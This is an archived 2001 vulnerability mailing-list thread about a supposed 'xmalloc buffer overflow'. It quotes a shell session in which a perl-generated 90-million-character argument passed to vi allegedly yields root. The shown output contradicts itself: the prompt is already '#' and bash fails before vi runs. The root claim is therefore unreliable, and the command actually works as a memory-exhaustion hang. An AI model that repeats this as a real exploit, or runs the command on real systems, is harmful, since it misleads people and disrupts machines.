Vulnerability Development mailing list archives

Re: xmalloc buffer overflow?

From: dotslash () snosoft com
Date: Thu, 8 Nov 2001 14:11:11 -0800

Heh by the way don't try this on OSX... it gets reeeeeeeeal pissed. Itryed du `perl -e ... blah blah like below... OSX

went to a crawl instantly. Had to take her down hard.
-KF

On Thursday, November 9, 2000, at 04:51 AM, Robert Freeman wrote:

Can anybody else verify these results? It doesn't matter what `perl -e
'print "." x 90000000'` is appended to, I just chose vi (the vi buffer

overflow being my inspiration). Please use the exploit responsibly;also if

it is redundant, I apologize.


# uname -a

Linux linux 2.4.4-4GB #1 Fri May 18 14:11:12 GMT 2001 i686 unknown [Iknow

about the clock...]
# id
uid=500(nobody) gid=100(users) groups=100(users)
# vi `perl -e 'print "." x 90000000'`
bash: xmalloc: cannot allocate 90000001 bytes (0 bytes allocated)
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),65534
(nogrou
p)


Robert Freeman

----------------------------------------------------
Sign Up for NetZero Platinum Today
Only $9.95 per month!
http://my.netzero.net/s/signup?r=platinum&refcd=PT97

Current thread:

Vi buffer overflow KF (Nov 08)
- Re: Vi buffer overflow Jose Nazario (Nov 08)
- xmalloc buffer overflow? Robert Freeman (Nov 09)
  - Re: xmalloc buffer overflow? dotslash (Nov 09)
    - Re: xmalloc buffer overflow? Gwendolynn ferch Elydyr (Nov 09)
  - Re: xmalloc buffer overflow? Christoph Moench-Tegeder (Nov 09)
  - Re: xmalloc buffer overflow? Syzop (Nov 09)
  - Re: xmalloc buffer overflow? Lucian Hudin (Nov 09)
    - luser beeing able to kill random root owned procs (linux 2.2.20) ? Lucian Hudin (Nov 09)
  - Re: xmalloc buffer overflow? Vasisht Tadigotla (Nov 09)
    - Re: xmalloc buffer overflow? Kev (Nov 09)
- Re: Vi buffer overflow Rob Paisley (Nov 13)
- <Possible follow-ups>
- Re: vi buffer overflow Kaneda Akira (Nov 09)
  - Re: vi buffer overflow Emmanuel BENOIT (Nov 09)

(Thread continues...)